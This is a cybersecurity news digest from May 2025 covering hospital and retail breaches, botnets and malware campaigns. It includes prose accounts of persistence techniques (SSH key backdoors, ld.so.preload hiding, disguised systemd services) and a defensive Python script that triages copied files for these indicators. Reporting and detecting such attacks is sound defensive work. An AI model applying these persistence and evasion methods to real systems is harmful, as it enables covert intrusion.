CyberSecurity news

@WhatIs //
A cyberattack struck Covenant Health on Monday, May 26, 2025, disrupting operations at St. Joseph Hospitals in Bangor, Maine, and Nashua, New Hampshire, as well as St. Mary’s Health System and Community Clinics in Lewiston, Maine. The healthcare provider, a Catholic-based nonprofit serving New England and parts of Pennsylvania, was forced to shut down all data systems across its hospitals, clinics, and provider practices as a protective measure against the "cyber incident initiated by an outside group." This action has impacted access to electronic records, appointment scheduling, and internal communications, leading to connectivity issues throughout the organization.

The cyberattack has led to significant operational disruptions at the affected facilities. In both Bangor and Nashua, ambulance services have been diverted, and diagnostic scans have been redirected to other locations. Patients have reported difficulties in refilling prescriptions, and outpatient lab services at St. Joseph Hospital in Nashua are now only available on the main hospital campus with a physical order in hand. Staff are working under modified procedures to maintain patient care amidst the system outages. The hospitals have posted notices on their websites acknowledging the disruptions and assuring the public that teams are working to restore full services as quickly as possible.

Covenant Health spokesperson Karen Sullivan confirmed that cybersecurity experts have been engaged to investigate the breach and assist in restoring system functionality. While a timeline for full restoration has not been provided, the organization emphasizes that patient care remains a priority. Cybersecurity analysts are warning that medical institutions are increasingly vulnerable to cyberattacks due to the high value of patient data on illicit markets, stressing the urgent need for enhanced digital defenses across the healthcare sector. The incident is currently under investigation, and updates will be provided as more information becomes available.

References:
  • DataBreaches.Net: Possible ransomware attack disrupts Maine and New Hampshire Covenant Health locations
  • The Dysruption Hub: Cyberattack Disrupts Operations at St. Joseph Hospitals in Maine and New Hampshire
  • WhatIs: Covenant Health cyberattack disrupts New England hospitals

@securityonline.info //
Multiple local vulnerabilities have been discovered in the Kea DHCP server suite, affecting default installations on Linux and BSD distributions. The SUSE Security Team found the flaws during a routine code review carried out before Kea was due to ship in SUSE products. Among the issues is a critical local root exploit: an unprivileged user can inject a hook library and thereby execute arbitrary code with root privileges. Other vulnerabilities include the ability to overwrite configuration files via the config-write command, as well as hash denial-of-service issues.

The set-config REST API command presents a significant security risk, because it grants complete control over the configuration of the kea-ctrl-agent and of the individual Kea services. That control allows a trivial local privilege escalation: an unprivileged user configures a hook library they control and the service loads it. The vulnerabilities were found in Kea release 2.6.1, but older releases are believed to be affected as well. In total the report details seven security issues, including local privilege escalation and arbitrary file overwrite vulnerabilities.

The Internet Systems Consortium (ISC) has addressed these vulnerabilities by releasing security fixes in all currently supported release series of Kea: 2.4.2, 2.6.3, and 2.7.9. These updates were made available on May 28, 2025, and users are strongly advised to update their Kea DHCP server installations immediately. CVE numbers CVE-2025-32801, CVE-2025-32802, and CVE-2025-32803 have been assigned to the vulnerabilities, with some CVEs covering multiple security flaws.


@www.pcrisk.com //
A sophisticated multi-stage malware campaign is exploiting the growing interest in AI video generation tools to distribute the Noodlophile information stealer. Cybercriminals are using social media platforms like Facebook and LinkedIn to post malicious ads that lure users to fake websites promising AI video generation services. These websites, designed to mimic legitimate AI tools such as Luma AI, Canva Dream Lab, and Kling AI, instead deliver a range of malware including infostealers, Trojans, and backdoors. The campaign has been active since mid-2024, with thousands of malicious ads reaching millions of unsuspecting users.

The attackers, identified as the Vietnamese-speaking threat group UNC6032, utilize a complex infrastructure to evade detection. They constantly rotate the domains used in their ads and create new ads daily, using both compromised and newly created accounts. Once a user clicks on a malicious ad and visits a fake website, they are led through a deceptive process that appears to generate an AI video. However, instead of receiving a video, the user is prompted to download a ZIP file containing malware. Executing this file compromises the device, potentially logging keystrokes, scanning for password managers and digital wallets, and installing backdoors.

The malware deployed in this campaign includes the STARKVEIL dropper, which then deploys the XWorm and FROSTRIFT backdoors, and the GRIMPULL downloader. The Noodlophile stealer itself is designed to extract sensitive information such as login credentials, cookies, and credit card data, which is then exfiltrated through Telegram. Mandiant Threat Defense reports that these attacks have resulted in the theft of personal information and are concerned that the stolen data is likely sold on illegal online markets. Users are urged to exercise caution and verify the legitimacy of AI tools before using them.

References:
  • www.pcrisk.com: Noodlophile Stealer Removal Guide
  • Malwarebytes: Cybercriminals are using text-to-video-AI tools to lure victims to fake websites that deliver malware like infostealers and Trojans.
  • hackread.com: Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers
  • PCMag UK security: Cybercriminals are capitalizing on interest in AI video tools by posting malware-laden ads on Facebook and LinkedIn, according to Google's threat intelligence unit.
  • Virus Bulletin: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake "AI video generator" websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • PCMag Middle East ai: Be Careful With Facebook Ads for AI Video Generators: They Could Be Malware
  • The Register - Security: Millions may fall for it - and end up with malware instead A group of miscreants tracked as UNC6032 is exploiting interest in AI video generators by planting malicious ads on social media platforms to steal credentials, credit card details, and other sensitive info, according to Mandiant.
  • cloud.google.com: Google Threat Intelligence Group (GTIG) assesses UNC6032 to have a Vietnam nexus.
  • Threat Intelligence: Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites

@www.microsoft.com //
References: www.microsoft.com
Microsoft is aggressively integrating artificial intelligence across its products and services, striving to revolutionize the user experience. The company is focused on developing agentic systems that can work independently, proactively identify problems, suggest solutions, and maintain context across interactions. Microsoft envisions a future where AI agents will augment and amplify organizational capabilities, leading to significant transformations in various fields. To facilitate secure and flexible interactions, Microsoft is employing Model Context Protocol (MCP) to enable AI models to interact with external services.

As AI agents become more sophisticated and integrated into business processes, Microsoft recognizes the importance of evolving identity standards. The company is actively working on robust mechanisms to ensure agents can securely access data and act across connected systems, including APIs, code repositories, and enterprise systems. Microsoft emphasizes that industry collaboration on identity standards is crucial for the safe and effective deployment of AI agents.

To aid organizations in safely adopting AI, Microsoft Deputy CISO Yonatan Zunger shares guidance for efficient implementation and defense against evolving identity attack techniques. Microsoft CVP Charles Lamanna offers an AI adoption playbook, emphasizing the importance of "customer obsession" and "extreme ownership" for both startups and large enterprises navigating the age of AI. Lamanna suggests focusing on a few high-impact AI projects instead of spreading resources thinly across numerous pilots.


Dissent@DataBreaches.Net //
ConnectWise, a prominent IT management software firm, has confirmed a cyberattack that impacted a limited number of its ScreenConnect customers. The company suspects the breach was the work of a sophisticated, state-sponsored actor. According to a brief advisory released by ConnectWise, the company detected suspicious activity within its environment, prompting an immediate investigation. The company emphasizes the seriousness of the incident and says it is working diligently to contain it.

The firm has engaged Mandiant, a leading forensic expert, to assist in the investigation and provide insights into the nature and scope of the attack. ConnectWise has also reached out to all affected customers, offering support and guidance to mitigate any potential damage. Furthermore, the company is actively coordinating with law enforcement to pursue all available avenues for addressing the cyberattack and holding the perpetrators accountable.

The incident serves as a stark reminder of the increasing threat landscape facing IT infrastructure providers. State-sponsored cyberattacks are often characterized by their advanced techniques, persistence, and significant resources, making them particularly challenging to defend against. ConnectWise's swift response, including engaging forensic experts and collaborating with law enforcement, demonstrates the importance of proactive security measures and incident response planning in today's digital environment.

References:
  • DataBreaches.Net: ConnectWise suspects cyberattack affecting some ScreenConnect customers was state-sponsored
  • BleepingComputer: ConnectWise breached in cyberattack linked to nation-state hackers
  • The Record: ConnectWise said it "recently learned of suspicious activity" within its environment that it believes "was tied to a sophisticated nation state actor, which affected a very small number of ScreenConnect customers."
  • www.techradar.com: ConnectWise hit by nation-state cyberattack, some ScreenConnect customer systems affected
  • securityaffairs.com: ConnectWise suffered a cyberattack carried out by a sophisticated nation state actor
  • The Hacker News: ConnectWise Hit by Cyberattack; Nation-State Actor Suspected in Targeted Breach
  • ciso2ciso.com: ConnectWise Confirms Hack, “Very Small Number” of Customers Affected

CyberNewswire@hackread.com //
SquareX has released new threat research highlighting a sophisticated Fullscreen Browser-in-the-Middle (BitM) attack that targets Apple Safari users. The attack exploits a flaw in the browser's Fullscreen API to create a convincing fullscreen window that mimics a legitimate login page. A pop-up window connects the victim to a remote, attacker-controlled browser; believing they are using a regular browser window, victims interact with it and divulge credentials and other sensitive information. Mandiant has highlighted the increasing use of BitM attacks to steal credentials and gain unauthorized access to enterprise SaaS apps.

The Safari-specific implementation flaw uses the Fullscreen API to create a BitM window in fullscreen mode, concealing the suspicious URL from the parent window. Safari users are particularly vulnerable due to the lack of clear visual indicators when entering fullscreen mode, making it difficult to distinguish between a legitimate page and a fake one. Attackers can easily embed a fake login button within the pop-up window that triggers the Fullscreen API upon being clicked. The current Fullscreen API requires user interaction to trigger fullscreen mode, but it does not specify the type of interaction required.

SquareX disclosed this vulnerability to Apple, but they were informed that there is no plan to address the issue. According to SquareX researchers, the Fullscreen BitM attack highlights architectural and design flaws in browser APIs, specifically the Fullscreen API. They emphasized that users could unknowingly click on a fake button and trigger a fullscreen BitM window, especially in Safari, where the lack of clear fullscreen mode cues allows threat actors to steal user credentials stealthily. This exploit renders existing security solutions obsolete when it comes to detecting this type of BitM attack.

References:
  • hackernoon.com: Fullscreen BitM Attack Discovered By SquareX Exploits Browser Fullscreen APIs To Steal Credentials
  • cyberinsider.com: Apple Safari Users Vulnerable to Stealthy Browser Attacks
  • BleepingComputer: Apple Safari exposes users to fullscreen browser-in-the-middle attacks
  • CyberInsider: Apple Safari Users Vulnerable to Stealthy Browser Attacks
  • Daily CyberSecurity: Fullscreen BitM Attack Discovered by SquareX Exploits Browser Fullscreen APIs to Steal Credentials in Safari
  • hackread.com: Fullscreen BitM Attack Discovered by SquareX Exploits Browser Fullscreen APIs to Steal Credentials in Safari

Pierluigi Paganini@Security Affairs //
Victoria's Secret has shut down its website and disabled some in-store services following a cybersecurity incident. The lingerie retailer's online presence was temporarily halted during the Memorial Day Weekend, a peak holiday shopping period. While physical Victoria's Secret and PINK retail stores remain open, the company has taken steps to address the issue and has engaged third-party experts to restore operations. The company has not said when operations will be back up and running.

The incident has disrupted online returns, fulfillment of recent orders, and the redemption of direct mail coupons, prompting the company to extend its U.S. return window by 30 days and to extend expired coupon redemption windows. Victoria's Secret customers have expressed frustration with the lack of updates and the difficulty of reaching representatives through chat, email, or phone. The company says it is working to fulfill orders placed before Monday.

The cyberattack on Victoria's Secret is part of a disturbing trend targeting global retailers, with recent breaches at Dior, Adidas, Harrods, Co-op, and Marks & Spencer. Experts such as Darren Guccione, CEO of Keeper Security, warn that this may signal that cybercrime groups are now actively targeting U.S. companies. Security professionals urge retailers to adopt proactive strategies like Privileged Access Management (PAM) and multi-factor authentication, while consumers are advised to use password managers and dark web monitoring services to protect themselves.

References:
  • cyberinsider.com: Victoria’s Secret Shuts Down Website and Store Systems Following Cyberattack
  • securityaffairs.com: Victoria’s Secret ‘s website offline following a cyberattack
  • Davey Winder: Victoria’s Secret Lingerie Site Down — Security Incident Cited
  • SecureWorld News: Victoria's Secret Latest Victim of Cyberattacks
  • Graham Cluley: Victoria's Secret has reportedly suffered a major IT outage due to a cybersecurity "incident."
  • www.cybersecuritydive.com: Victoria's Secret shuts down website in response to security incident
  • techcrunch.com: Victoria’s Secret hit by outages as it battles security incident
  • thecyberexpress.com: Victoria’s Secret Website Down After Security Incident
  • The Record: The Victoria's Secret site now features a brief message to customers explaining that the retailer is "taking steps to address a security incident."

@cyberinsider.com //
Mozilla has released Firefox 139 to address a critical security vulnerability within the libvpx video codec encoder. This flaw, identified as a double-free vulnerability, could potentially lead to memory corruption and allow for arbitrary code execution on affected systems. Security experts are urging users to update to the latest version of Firefox immediately to mitigate the risk.

The vulnerability is particularly concerning because it is a zero-interaction exploit, meaning that an attacker could potentially execute malicious code without any user action beyond normal browsing activity. This underscores the importance of applying the patch as soon as possible to prevent potential compromise. The update aims to protect users from remote code execution attacks that could exploit the flaw in the libvpx codec.

The cybersecurity community has highlighted the importance of prioritizing critical patches such as this one to defend against exploitation. This vulnerability demonstrates the persistent threat landscape and the need for constant vigilance in maintaining secure systems. By updating to Firefox 139, users can ensure they are protected against this potentially severe vulnerability.

References:
  • cyberinsider.com: Mozilla Patches Critical libvpx Double-Free Vulnerability in Firefox 139
  • securityonline.info: Firefox Alert: Zero-Interaction Exploit in libvpx Allows Arbitrary Code Execution

Pierluigi Paganini@securityaffairs.com //
GreyNoise researchers have uncovered a significant and stealthy campaign exploiting ASUS routers, leading to the formation of a new botnet dubbed "AyySSHush". This long-running operation has compromised thousands of ASUS routers, with numbers steadily increasing. The attackers are gaining unauthorized, persistent access to the devices, effectively establishing a distributed network of backdoors, potentially laying the foundation for a future, larger botnet.

This attack is achieved through a sophisticated, multi-step exploitation chain, showcasing advanced knowledge of ASUS systems. Initial access is gained through brute-force login attempts and previously undocumented authentication bypasses. Attackers then exploit CVE-2023-39780, a command injection vulnerability, to execute system commands. This allows them to enable SSH access on a custom port and insert an attacker-controlled SSH public key, granting persistent remote access.

The AyySSHush botnet's stealth is enhanced by disabling router logging to evade detection and avoiding the installation of any malware. Crucially, the backdoor is stored in non-volatile memory (NVRAM), ensuring it survives both firmware upgrades and reboots. As of late May 2025, data confirmed that over 9,000 ASUS routers had been compromised. This campaign highlights the critical need for prompt patching of router vulnerabilities to prevent exploitation and botnet recruitment.

References:
  • cyberinsider.com: A campaign targeting nearly 9,000 ASUS routers globally has given attackers persistent, undetectable access, likely to build a botnet network for future operations.
  • The GreyNoise Blog: GreyNoise uncovers a stealth campaign exploiting ASUS routers, enabling persistent backdoor access via CVE-2023-39780 and unpatched techniques. Learn how attackers evade detection, how GreyNoise discovered it with AI-powered tooling, and what defenders need to know.
  • Blog: ASUS routers exposed to the public Internet are being compromised, with backdoors being installed. Here's how to find impacted assets on your network.
  • www.scworld.com: ASUS router backdoors affect 9K devices, persist after firmware updates
  • securityonline.info: Beyond Malware: Stealthy ASUS Router Exploitation Survives Reboots, Builds Botnet
  • bsky.app: Over 9,000 ASUS routers are compromised by a novel botnet dubbed "AyySSHush" that was also observed targeting SOHO routers from Cisco
  • securityaffairs.com: New AyySSHush botnet compromised over 9,000 ASUS routers, adding a persistent SSH backdoor.
  • securityonline.info: Beyond Malware: Stealthy ASUS Router Exploitation Survives Reboots, Builds Botnet.
  • CyberInsider: 9,000 ASUS Routers Compromised in Stealthy Backdoor Campaign
  • BleepingComputer: Botnet hacks 9,000+ ASUS routers to add persistent SSH backdoor
  • www.techradar.com: Thousands of Asus routers hacked to create a major botnet planting damaging malware.
  • The Register - Security: 8,000+ Asus routers popped in 'advanced' mystery botnet plot
  • PCMag UK security: Cybercriminals Hack Asus Routers: Here's How to Check If They Got Into Yours
  • eSecurity Planet: Over 9,000 Routers Hijacked: ASUS Users Caught in Ongoing Cyber Operation
  • www.cybersecuritydive.com: Researchers have previously linked the suspected threat actor, dubbed ViciousTrap, to the exploitation of Cisco routers.
  • www.itpro.com: ASUS routers at risk from backdoor vulnerability
  • www.csoonline.com: CSOOnline: New botnet hijacks AI-powered security tool on Asus routers

Pierluigi Paganini@Security Affairs //
The Czech Republic has formally accused China of orchestrating a "malicious cyber campaign" targeting an unclassified communication network within its Ministry of Foreign Affairs. The attacks, attributed to the China-linked APT31 hacking group, are believed to have been ongoing since 2022. This action represents a significant escalation in tensions between the two nations regarding cyber espionage. In response to the detected activity, the Czech government summoned the Chinese ambassador to express its strong condemnation of these hostile actions and to convey the damaging impact on bilateral relations. The European Union has voiced its solidarity with Prague following this announcement, further highlighting the international implications of the cyberattack.

The Czech government, in a formal statement, identified the People's Republic of China as responsible for the cyber campaign. The government believes with a high degree of certainty that APT31, also known as Judgement Panda, Bronze Vinewood or RedBravo, a cyber-espionage group linked to China's Ministry of State Security, was behind the attacks. This group has a history of targeting government and defense supply chains. Czech authorities said the malicious activity “affected an institution designated as Czech critical infrastructure,” and targeted one of the Ministry of Foreign Affairs’ unclassified networks.

The Czech Republic asserts that the cyberattacks violate the norms of responsible state behavior in cyberspace endorsed by members of the United Nations, and that they undermine the credibility of China. The government is demanding that China adhere to these norms and refrain from similar activities in the future. The Czech Foreign Affairs Minister stated that the attribution was intended to expose China, "which has long been working to undermine our resilience and democracy." Because the attackers were detected while the operation was still under way, the ministry was able to deploy a new communication system, significantly strengthening its security.

References:
  • Lukasz Olejnik: The Czech Republic has accused China of a "malicious cyber campaign" targeting an unclassified communication network at its Foreign Affairs Ministry since 2022, summoning the Chinese ambassador in protest. The EU expressed solidarity with Prague following the announcement.
  • securityaffairs.com: Czech Republic accuses China’s APT31 of a cyberattack on its Foreign Ministry
  • BleepingComputer: Czechia blames China for Ministry of Foreign Affairs cyberattack
  • bsky.app: The Czech Republic says the Chinese-backed APT31 hacking group was behind cyberattacks targeting the country's Ministry of Foreign Affairs and critical infrastructure organizations.
  • The Hacker News: The Czech Republic on Wednesday formally accused a threat actor associated with the People's Republic of China (PRC) of targeting its Ministry of Foreign Affairs.
  • therecord.media: Czech authorities said they assessed with "a high degree of certainty" that a Chinese cyber-espionage group known as APT31 tried to hack into a government network.
  • mzv.gov.cz: Statement by the Government of the Czech Republic.

@www.trendmicro.com //
A new botnet, dubbed PumaBot, is actively targeting Linux-based IoT devices, posing a significant security risk. This Go-based malware is designed to steal SSH credentials through brute-force attacks, allowing it to spread malicious payloads and illicitly mine cryptocurrency. Unlike other botnets that perform broad internet scans, PumaBot employs a more targeted approach by retrieving lists of IP addresses from its command-and-control (C2) server, enabling it to focus its attacks on specific devices. This approach, coupled with its ability to impersonate legitimate system files, makes PumaBot a stealthy and dangerous threat to embedded Linux systems.

The attack begins with PumaBot attempting to brute-force SSH credentials on targeted devices, aiming to gain unauthorized access. Once inside, it establishes persistence using systemd service files, ensuring it survives reboots and remains active on the compromised device. To further mask its activities, PumaBot disguises itself as a legitimate Redis system file, attempting to blend in with normal system processes. After successfully gaining access to an infected system, it collects and exfiltrates basic system information to the C2 server, where it can receive commands to carry out its malicious objectives.

The primary goal of PumaBot appears to be cryptocurrency mining, as evidenced by the presence of "xmrig" and "networkxm" commands within its code. These commands suggest that compromised devices are being leveraged to generate illicit cryptocurrency gains for the botnet operators. Security experts also observed that the botnet performs checks to avoid honeypots and, curiously, looks for the string "Pumatronix," a surveillance and traffic camera manufacturer, hinting at a targeted or exclusionary approach. The discovery highlights the ongoing need for robust security measures for IoT devices, as they continue to be attractive targets for botnet recruitment and malicious activities.

References:
  • ciso2ciso.com: New PumaBot Botnet Targets Linux IoT Devices to Steal SSH Credentials and Mine Crypto – Source:thehackernews.com
  • Anonymous: New PumaBot targets Linux IoT devices, using SSH brute-force attacks to steal credentials, spread malware, and mine crypto.
  • securityaffairs.com: New PumaBot targets Linux IoT surveillance devices
  • The Hacker News: New PumaBot Botnet Targets Linux IoT Devices to Steal SSH Credentials and Mine Crypto
  • BleepingComputer: A newly discovered Go-based Linux botnet malware named PumaBot is brute-forcing SSH credentials on embedded IoT devices to deploy malicious payloads.
  • gbhackers.com: New PumaBot Hijacks IoT Devices via SSH Brute-Force for Persistent Access
  • www.csoonline.com: Novel PumaBot slips into IoT surveillance with stealthy SSH break-ins

info@thehackernews.com (The Hacker News)@The Hacker News //
A new cyber threat has emerged, with the threat actor known as Mimo exploiting a recently disclosed remote code execution vulnerability, CVE-2025-32432, in the Craft Content Management System (CMS). The attackers are leveraging this vulnerability to deploy a suite of malicious payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware on compromised websites. This allows them to not only abuse system resources for illicit cryptocurrency mining, but also monetize the victim's internet bandwidth for other malicious activities.

The exploitation of CVE-2025-32432 unfolds in two phases. The attacker activates a web shell by injecting PHP code via a specially crafted GET request. This action triggers a redirection, prompting the application to record the return URL within a server-side PHP session file. Once the web shell is enabled, commands can be executed remotely. The web shell is used to download and execute a shell script, which checks for indicators of prior infection and uninstalls any existing cryptocurrency miners before delivering next-stage payloads and launching the Mimo Loader.

The Mimo Loader modifies "/etc/ld.so.preload" to hide the malware process. Its ultimate goal is to deploy the IPRoyal proxyware and the XMRig miner on the compromised host. Sekoia researchers Jeremy Scion and Pierre Le Bourhis noted the unusual naming choice of the Python library "urllib2" being aliased as "fbi," suggesting it may be a tongue-in-cheek nod to the American federal agency, serving as a distinctive coding choice and a potential indicator for detection. The activity has been linked to the Mimo intrusion set, which has been active since at least March 2022 and has previously exploited vulnerabilities in Apache Log4j, Atlassian Confluence, PaperCut, and Apache ActiveMQ.
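Three of the items above describe persistence on a compromised Linux host that leaves little or no malware behind: AyySSHush adds an attacker key to the SSH configuration and opens SSH on a custom port, PumaBot installs a systemd service whose binary is disguised as a Redis file, and the Mimo Loader writes to /etc/ld.so.preload. The script below is an added example for this digest, not code from GreyNoise, Trend Micro, Sekoia or any other cited source; it triages copies of those artefacts for exactly these indicators. The function names, the `Finding` type, the `TRUSTED_EXEC_DIRS` list and all sample file contents (keys, ports, paths) are assumptions constructed for the example, not values taken from the reports.

```python
"""Triage of the Linux persistence artefacts described in the AyySSHush,
PumaBot and Mimo items: added example, not code from any cited report.
Assumes the files have been copied off the host (or read from a backup);
the sample contents at the bottom are constructed, not captured."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Directories from which packaged services normally run (assumption: tune per distro).
TRUSTED_EXEC_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/",
                     "/usr/libexec/", "/usr/local/bin/", "/usr/local/sbin/")

# key type, base64 blob, optional comment; anything before the type is options.
KEY_RE = re.compile(r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+|sk-[\w@.-]+)\s+(\S+)(?:\s+(.*))?$")


@dataclass(frozen=True)
class Finding:
    source: str   # which artefact produced the finding
    detail: str


def check_authorized_keys(text: str, known_blobs: set[str]) -> list[Finding]:
    """AyySSHush: flag any key blob that is not on the administrator's allowlist."""
    findings: list[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if m is None:
            findings.append(Finding("authorized_keys", f"unparseable line: {line[:40]}"))
            continue
        ktype, blob, comment = m.group(1), m.group(2), m.group(3) or "no comment"
        if blob not in known_blobs:
            findings.append(Finding("authorized_keys", f"unknown {ktype} key ({comment})"))
    return findings


def check_sshd_ports(config_text: str, expected: frozenset[int] = frozenset({22})) -> list[Finding]:
    """AyySSHush: flag SSH listening on a port nobody configured."""
    findings: list[Finding] = []
    for line in config_text.splitlines():
        parts = line.split()
        if len(parts) == 2 and parts[0].lower() == "port" and parts[1].isdigit():
            if int(parts[1]) not in expected:
                findings.append(Finding("sshd_config", f"unexpected Port {parts[1]}"))
    return findings


def check_systemd_unit(name: str, unit_text: str) -> list[Finding]:
    """PumaBot: flag ExecStart binaries living outside the usual packaged directories."""
    findings: list[Finding] = []
    for line in unit_text.splitlines():
        line = line.strip()
        if not line.startswith("ExecStart="):
            continue
        cmd = line[len("ExecStart="):].split()
        # systemd allows prefixes such as '-', '@', '+' and '!' before the path.
        path = cmd[0].lstrip("-@+!:") if cmd else ""
        if not path.startswith(TRUSTED_EXEC_DIRS):
            findings.append(Finding(f"systemd:{name}", f"ExecStart outside trusted dirs: {path}"))
    return findings


def check_ld_preload(text: str, allowed: frozenset[str] = frozenset()) -> list[Finding]:
    """Mimo: every library listed here is loaded into every dynamically linked
    process, and on most hosts the file is absent, so each entry is a finding."""
    findings: list[Finding] = []
    for line in text.splitlines():
        for entry in line.split("#", 1)[0].split():
            if entry not in allowed:
                findings.append(Finding("ld.so.preload", f"preloaded library: {entry}"))
    return findings


# Constructed samples: one benign line and one indicator per artefact.
SAMPLE_AUTHORIZED_KEYS = """\
# constructed sample, not a real key file
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyPlaceholder admin@mgmt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCUnknownKeyPlaceholder
"""
KNOWN_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIKnownAdminKeyPlaceholder"}
SAMPLE_SSHD_CONFIG = "Port 22\nPort 2222\n"          # constructed extra port
SAMPLE_UNIT = "[Service]\nExecStart=/opt/.cache/redis --daemon\nRestart=always\n"  # constructed
SAMPLE_LD_PRELOAD = "/usr/local/lib/libhelper.so\n"  # constructed entry


def triage() -> list[Finding]:
    """Run every check over the constructed samples; returns the findings."""
    return (check_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEY_BLOBS)
            + check_sshd_ports(SAMPLE_SSHD_CONFIG)
            + check_systemd_unit("redis-persist.service", SAMPLE_UNIT)
            + check_ld_preload(SAMPLE_LD_PRELOAD))


if __name__ == "__main__":
    for f in triage():
        print(f"[{f.source}] {f.detail}")
```

Each check works on file contents rather than on the live host, so the same functions can be pointed at a forensic image or a configuration backup; the allowlists (`known_blobs`, `expected`, `allowed`) are where site-specific knowledge goes, and an empty allowlist for ld.so.preload is the right default on hosts that run no preload-based agent.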

References:
  • blog.sekoia.io: Jeremy Scion, Pierre Le Bourhis & Sekoia TDR present an analysis of the compromise chain initiated by the exploitation of CVE-2025-32432. The exploitation occurred in a CMS honeypot and led to a loader, a crypto miner, and a residential proxyware.
  • bsky.app: Sekoia has identified Mimo, a threat actor that exploits a recently patched Craft CMS zero-day to deploy its own loader, cryptominers, and residential proxyware on hacked websites
  • The Hacker News: Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware
  • securityonline.info: Mimo Returns: CVE-2025-32432 Exploited in Cryptomining and Proxyware Campaigns
  • ciso2ciso.com: Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware – Source:thehackernews.com
  • bsky.app: Sekoia has identified Mimo, a threat actor that exploits a recently patched Craft CMS zero-day to deploy its own loader, cryptominers, and residential proxyware on hacked websites The operators appear to be based in the Middle East
  • Virus Bulletin: Jeremy Scion, Pierre Le Bourhis & Sekoia TDR present an analysis of the compromise chain initiated by the exploitation of CVE-2025-32432. The exploitation occurred in a CMS honeypot and led to a loader, a crypto miner, and a residential proxyware.

Pierluigi Paganini@Security Affairs //
Cybercriminals are using a fake Bitdefender website to distribute the Venom RAT (Remote Access Trojan) and other malicious programs, tricking users into downloading what they believe is legitimate antivirus software. The spoofed domain, bitdefender-download[.]com, closely mimics the official Bitdefender site, making it difficult for unsuspecting users to distinguish between the real and fake versions. This campaign highlights the importance of verifying the legitimacy of software download sources to avoid becoming a victim of malware.

Researchers have found that clicking on the "Download for Windows" button on the fraudulent site initiates a file download from a Bitbucket repository that redirects to an Amazon S3 bucket. The downloaded ZIP archive, named "BitDefender.zip," contains an executable ("StoreInstaller.exe") which includes malware configurations associated with Venom RAT, as well as code related to the open-source post-exploitation framework SilentTrinity and StormKitty stealer. These tools work in concert to compromise user systems.

The Venom RAT allows attackers to harvest data and maintain persistent remote access to compromised systems. Additionally, the StormKitty malware steals passwords, including those for cryptocurrency wallets, while SilentTrinity ensures the attacker can remain hidden and maintain long-term control. DomainTools suspects the fake Bitdefender site was likely used in phishing attacks, given its overlap with internet infrastructure hosting other fake sites impersonating banks and IT services, further emphasizing the malicious intent behind this cloned website.

Recommended read:
References :
  • securityaffairs.com: Crooks use a fake antivirus site to spread Venom RAT and a mix of malware
  • The Hacker News: Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets
  • PCMag UK security: Don't Fall For It: Fake Bitdefender Site Will Infect Your PC With Malware
  • www.pcmag.com: Don't Fall For It: Fake Bitdefender Site Will Infect Your PC With Malware | PCMag

@www.microsoft.com //
IACR News has highlighted recent work in post-quantum cryptography, the part of the field concerned with keeping data secure against an adversary who has a large quantum computer. The focus is on algorithms and protocols whose security does not rest on the factoring and discrete-logarithm problems that Shor's algorithm breaks, so that they remain secure once today's RSA and elliptic-curve schemes fall. Among these efforts, FrodoKEM stands out as a deliberately conservative quantum-safe key encapsulation mechanism: it is built on the unstructured Learning With Errors problem rather than on ring or module lattices, accepting larger keys and ciphertexts in exchange for a smaller set of assumptions.

The adaptive security of key-unique threshold signatures is also under scrutiny. Research by Elizabeth Crites, Chelsea Komlo and Mary Maller examines which assumptions are needed to prove adaptive security for threshold signatures, that is, security against an adversary who chooses which signers to corrupt while the protocol runs rather than fixing them in advance. Their work gives impossibility results showing how hard adaptive security is to achieve for key-unique threshold schemes, in particular those whose output is compatible with standard single-party signatures such as BLS, ECDSA and Schnorr. The aim is to guide the choice of new assumptions and scheme properties for constructing adaptively secure threshold schemes.

In related news, Muhammed F. Esgin is offering PhD and post-doc positions in post-quantum cryptography at Monash University, seeking candidates with a strong mathematics and cryptography background. Students can expect to start research from the beginning, supported by competitive stipends and opportunities for teaching-assistant roles. Such positions matter because the cryptographers who will design and implement post-quantum schemes have to be trained now, ahead of the migration.

Recommended read:
References :
  • mfesgin.github.io: PhD and Post-Doc in Post-Quantum Cryptography
  • IACR News: Zero-Trust Post-quantum Cryptography Implementation Using Category Theory

djohnson@CyberScoop //
Mandiant, in collaboration with Google Cloud, has uncovered a cybercriminal campaign exploiting public interest in AI video generation. A group tracked as UNC6032, believed to be based in Vietnam, is spreading malware through fake advertisements, websites, and social media posts that promise access to popular prompt-to-video AI tools like Luma AI, Canva Dream Lab, and Kling AI. These malicious campaigns are designed to trick users into downloading infostealers and backdoors, compromising their devices and data.

UNC6032 has successfully reached millions of users across various social media platforms, including Facebook and LinkedIn, with thousands of malicious ads. These advertisements lure victims to phishing pages disguised as legitimate AI video generators. When users click on the "Start Free Now" button, they are led through a bogus video generation interface. After watching a fake loading bar, the site delivers a ZIP file containing malware. Once executed, this malware backdoors the victim's device and steals sensitive information.

Compromised users have had login credentials, cookies, credit card data and Facebook account information stolen. Mandiant's research indicates that the scheme affects a wide range of industries and regions. Researchers caution users to be wary of advertisements promising free access to premium software, to verify the source of any "video generator" before downloading from it, and never to run scripts or open archives supplied by an unfamiliar site.

Recommended read:
References :
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • The Register - Security: Don't click on that Facebook ad for a text-to-AI-video tool
  • PCMag UK security: Warning AI-Generated TikTok Videos Want to Trick You Into Installing Malware
